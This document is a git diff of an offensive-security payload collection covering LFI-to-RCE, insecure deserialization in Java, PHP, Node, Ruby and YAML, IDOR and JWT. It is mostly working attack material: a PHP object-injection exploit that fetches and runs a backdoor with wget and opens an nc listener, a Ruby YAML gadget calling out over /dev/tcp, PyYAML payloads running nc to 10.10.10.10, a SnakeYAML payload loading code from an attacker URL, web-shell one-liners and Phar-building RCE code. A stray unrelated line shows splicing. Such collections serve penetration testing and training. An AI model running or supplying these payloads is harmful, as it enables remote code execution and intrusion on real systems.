User-Agent: <?=phpinfo(); ?>
|
||||
```
|
||||
|
||||
|
||||
## LFI to RCE via upload
|
||||
|
||||
If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
|
||||
@ -253,6 +270,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
|
||||
|
||||
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
|
||||
|
||||
|
||||
## LFI to RCE via upload (race)
|
||||
Worlds Quitest Let's Play"
|
||||
* Upload a file and trigger a self-inclusion.
|
||||
@ -447,12 +465,14 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
||||
* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
|
||||
* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
|
||||
* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
|
||||
* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
|
||||
* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
|
||||
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
|
||||
* [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379)
|
||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
|
||||
* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
||||
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
||||
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
||||
|
@ -33,6 +33,7 @@
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||
* [CrackQL - A GraphQL password brute-force and fuzzing utility.](https://github.com/nicholasaleks/CrackQL)
|
||||
|
||||
## Exploit
|
||||
|
||||
|
@ -1,32 +0,0 @@
|
||||
<?php
|
||||
/*
|
||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
||||
|
||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
||||
|
||||
Shouts to @jstnkndy @yappare for the assist!
|
||||
|
||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
||||
*/
|
||||
|
||||
print "==============================================================================\r\n";
|
||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
print "[+] Generating serialized payload...[OK]\r\n";
|
||||
print "[+] Launching reverse listener...[OK]\r\n";
|
||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
||||
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
}
|
||||
|
||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
||||
print "[+] Sending exploit...[OK]\r\n";
|
||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
$response = file_get_contents("$url");
|
||||
|
||||
?>
|
5
Insecure Deserialization/Files/node-serialize.js
Normal file
@ -0,0 +1,5 @@
|
||||
var y = {
|
||||
rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
|
||||
}
|
||||
var serialize = require('node-serialize');
|
||||
console.log("Serialized: \n" + serialize.serialize(y));
|
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
|
||||
method_id: :resolve
|
@ -2,14 +2,16 @@
|
||||
|
||||
## Detection
|
||||
|
||||
- "AC ED 00 05" in Hex
|
||||
- "rO0" in Base64
|
||||
- `"AC ED 00 05"` in Hex
|
||||
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
|
||||
* `00 05`: STREAM_VERSION. The serialization version.
|
||||
- `"rO0"` in Base64
|
||||
- Content-type = "application/x-java-serialized-object"
|
||||
- "H4sIAAAAAAAAAJ" in gzip(base64)
|
||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||
|
||||
## Exploit
|
||||
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
|
||||
```java
|
||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||
@ -18,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
|
||||
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
||||
```
|
||||
|
||||
payload | author | dependencies | impact (if not RCE)
|
||||
------|--------|------ |------
|
||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
||||
Groovy1 |@frohoff |groovy:2.3.9
|
||||
Hibernate1 |@mbechler|
|
||||
Hibernate2 |@mbechler|
|
||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient |@mbechler|
|
||||
JRMPListener |@mbechler|
|
||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 |@frohoff|
|
||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
||||
Myfaces1 |@mbechler|
|
||||
Myfaces2 |@mbechler|
|
||||
ROME |@mbechler |rome:1.0
|
||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS |@gebl| | jre only vuln detect
|
||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```ps1
|
||||
Payload Authors Dependencies
|
||||
------- ------- ------------
|
||||
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||
Clojure @JackOfMostTrades clojure:1.8.0
|
||||
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 @frohoff commons-collections:3.1
|
||||
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||
CommonsCollections3 @frohoff commons-collections:3.1
|
||||
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||
Groovy1 @frohoff groovy:2.3.9
|
||||
Hibernate1 @mbechler
|
||||
Hibernate2 @mbechler
|
||||
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient @mbechler
|
||||
JRMPListener @mbechler
|
||||
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 @frohoff
|
||||
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||
MozillaRhino2 @_tint0 js:1.7R2
|
||||
Myfaces1 @mbechler
|
||||
Myfaces2 @mbechler
|
||||
ROME @mbechler rome:1.0
|
||||
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS @gebl
|
||||
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```
|
||||
|
||||
## Burp extensions using ysoserial
|
||||
|
||||
@ -67,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
|
||||
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
||||
|
||||
```java
|
||||
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
|
||||
|
||||
where
|
||||
-a - generates/tests all payloads for that marshaller
|
||||
@ -99,10 +109,12 @@ Payload generators for the following marshallers are included:<br />
|
||||
## References
|
||||
|
||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
||||
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
|
||||
- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
|
||||
- [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
|
34
Insecure Deserialization/Node.md
Normal file
@ -0,0 +1,34 @@
|
||||
# Node
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploit](#exploit)
|
||||
* [References](#references)
|
||||
|
||||
## Exploit
|
||||
|
||||
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
|
||||
|
||||
1. Generate a serialized payload
|
||||
```js
|
||||
var y = {
|
||||
rce : function(){
|
||||
require('child_process').exec('ls /', function(error,
|
||||
stdout, stderr) { console.log(stdout) });
|
||||
},
|
||||
}
|
||||
var serialize = require('node-serialize');
|
||||
console.log("Serialized: \n" + serialize.serialize(y));
|
||||
```
|
||||
2. Add bracket `()` to force the execution
|
||||
```js
|
||||
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
|
||||
```
|
||||
3. Send the payload
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
|
||||
* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
|
||||
* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
|
@ -119,7 +119,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
||||
|
||||
## Finding and using gadgets
|
||||
|
||||
Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||
|
||||
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
|
||||
|
||||
@ -133,6 +133,7 @@ Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
|
||||
```powershell
|
||||
phpggc monolog/rce1 'phpinfo();' -s
|
||||
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
|
||||
```
|
||||
|
||||
## PHP Phar Deserialization
|
||||
@ -141,42 +142,68 @@ Using `phar://` wrapper, one can trigger a deserialization on the specified file
|
||||
|
||||
A valid PHAR includes four elements:
|
||||
|
||||
1. Stub
|
||||
2. Manifest
|
||||
3. File Contents
|
||||
4. Signature
|
||||
1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.
|
||||
2. **Manifest**: Contains metadata about the archive and its contents.
|
||||
3. **File Contents**: Contains the actual files in the archive.
|
||||
4. **Signature**(optional): For verifying archive integrity.
|
||||
|
||||
Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
||||
|
||||
```php
|
||||
<?php
|
||||
class PDFGenerator { }
|
||||
* Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
||||
```php
|
||||
<?php
|
||||
class PDFGenerator { }
|
||||
|
||||
//Create a new instance of the Dummy class and modify its property
|
||||
$dummy = new PDFGenerator();
|
||||
$dummy->callback = "passthru";
|
||||
$dummy->fileName = "uname -a > pwned"; //our payload
|
||||
//Create a new instance of the Dummy class and modify its property
|
||||
$dummy = new PDFGenerator();
|
||||
$dummy->callback = "passthru";
|
||||
$dummy->fileName = "uname -a > pwned"; //our payload
|
||||
|
||||
// Delete any existing PHAR archive with that name
|
||||
@unlink("poc.phar");
|
||||
// Delete any existing PHAR archive with that name
|
||||
@unlink("poc.phar");
|
||||
|
||||
// Create a new archive
|
||||
$poc = new Phar("poc.phar");
|
||||
// Create a new archive
|
||||
$poc = new Phar("poc.phar");
|
||||
|
||||
// Add all write operations to a buffer, without modifying the archive on disk
|
||||
$poc->startBuffering();
|
||||
// Add all write operations to a buffer, without modifying the archive on disk
|
||||
$poc->startBuffering();
|
||||
|
||||
// Set the stub
|
||||
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
|
||||
// Set the stub
|
||||
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
|
||||
|
||||
/* Add a new file in the archive with "text" as its content*/
|
||||
$poc["file"] = "text";
|
||||
// Add the dummy object to the metadata. This will be serialized
|
||||
$poc->setMetadata($dummy);
|
||||
// Stop buffering and write changes to disk
|
||||
$poc->stopBuffering();
|
||||
?>
|
||||
```
|
||||
/* Add a new file in the archive with "text" as its content*/
|
||||
$poc["file"] = "text";
|
||||
// Add the dummy object to the metadata. This will be serialized
|
||||
$poc->setMetadata($dummy);
|
||||
// Stop buffering and write changes to disk
|
||||
$poc->stopBuffering();
|
||||
?>
|
||||
```
|
||||
|
||||
* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub.
|
||||
```php
|
||||
<?php
|
||||
class AnyClass {
|
||||
public $data = null;
|
||||
public function __construct($data) {
|
||||
$this->data = $data;
|
||||
}
|
||||
|
||||
function __destruct() {
|
||||
system($this->data);
|
||||
}
|
||||
}
|
||||
|
||||
// create new Phar
|
||||
$phar = new Phar('test.phar');
|
||||
$phar->startBuffering();
|
||||
$phar->addFromString('test.txt', 'text');
|
||||
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
|
||||
|
||||
// add object of any class as meta data
|
||||
$object = new AnyClass('whoami');
|
||||
$phar->setMetadata($object);
|
||||
$phar->stopBuffering();
|
||||
```
|
||||
|
||||
|
||||
## Real world examples
|
||||
@ -200,3 +227,4 @@ $poc->stopBuffering();
|
||||
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
|
@ -8,6 +8,11 @@ Check the following sub-sections, located in other files :
|
||||
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||
* [Python : pickle, ...](Python.md)
|
||||
* [YAML : PyYAML, ...](YAML.md)
|
||||
|
||||
## LABS
|
||||
|
||||
* [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization)
|
||||
|
||||
## References
|
||||
|
||||
|
@ -16,7 +16,7 @@ require "yaml"
|
||||
YAML.load(File.read("p.yml"))
|
||||
```
|
||||
|
||||
Exploitation code
|
||||
Universal gadget for ruby <= 2.7.2:
|
||||
```ruby
|
||||
--- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
@ -29,9 +29,35 @@ requirements:
|
||||
spec:
|
||||
```
|
||||
|
||||
Universal gadget for ruby 2.x - 3.x.
|
||||
|
||||
```ruby
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: id
|
||||
method_id: :resolve
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
99
Insecure Deserialization/YAML.md
Normal file
@ -0,0 +1,99 @@
|
||||
# YAML Deserialization
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [ruamel.yaml](#ruamelyaml)
|
||||
* [Ruby](#ruby)
|
||||
* [SnakeYAML](#snakeyaml)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
|
||||
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
|
||||
|
||||
## Exploit
|
||||
|
||||
### PyYAML
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:time.sleep [10]
|
||||
!!python/object/apply:builtins.range [1, 10, 1]
|
||||
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
|
||||
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
|
||||
!!python/object/new:subprocess [["ls","-ail"]]
|
||||
!!python/object/new:subprocess.check_output [["ls","-ail"]]
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:subprocess.Popen
|
||||
- ls
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/new:str
|
||||
state: !!python/tuple
|
||||
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
||||
- !!python/object/new:Warning
|
||||
state:
|
||||
update: !!python/name:exec
|
||||
```
|
||||
|
||||
Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution.
|
||||
[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420)
|
||||
|
||||
The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)```
|
||||
|
||||
```
|
||||
with open('exploit_unsafeloader.yml') as file:
|
||||
data = yaml.load(file,Loader=yaml.UnsafeLoader)
|
||||
```
|
||||
|
||||
## Ruamel.yaml
|
||||
|
||||
## Ruby
|
||||
|
||||
```ruby
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: sleep 600
|
||||
method_id: :resolve
|
||||
```
|
||||
|
||||
## SnakeYAML
|
||||
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [
|
||||
!!java.net.URLClassLoader [[
|
||||
!!java.net.URL ["http://attacker-ip/"]
|
||||
]]
|
||||
]
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
|
||||
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
|
||||
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
||||
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
|
@ -48,6 +48,10 @@ http://foo.bar/accessPage?menuitem=12
|
||||
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
|
||||
* [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
|
||||
|
||||
## Labs
|
||||
|
||||
* [Insecure direct object references](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
|
||||
|
1401
Insecure Source Code Management/Files/github-dorks.txt
Normal file
@ -287,6 +287,15 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||
* CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability
|
||||
* CVE-2020-28042 - Null signature vulnerability
|
||||
|
||||
## Labs
|
||||
|
||||
* [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature)
|
||||
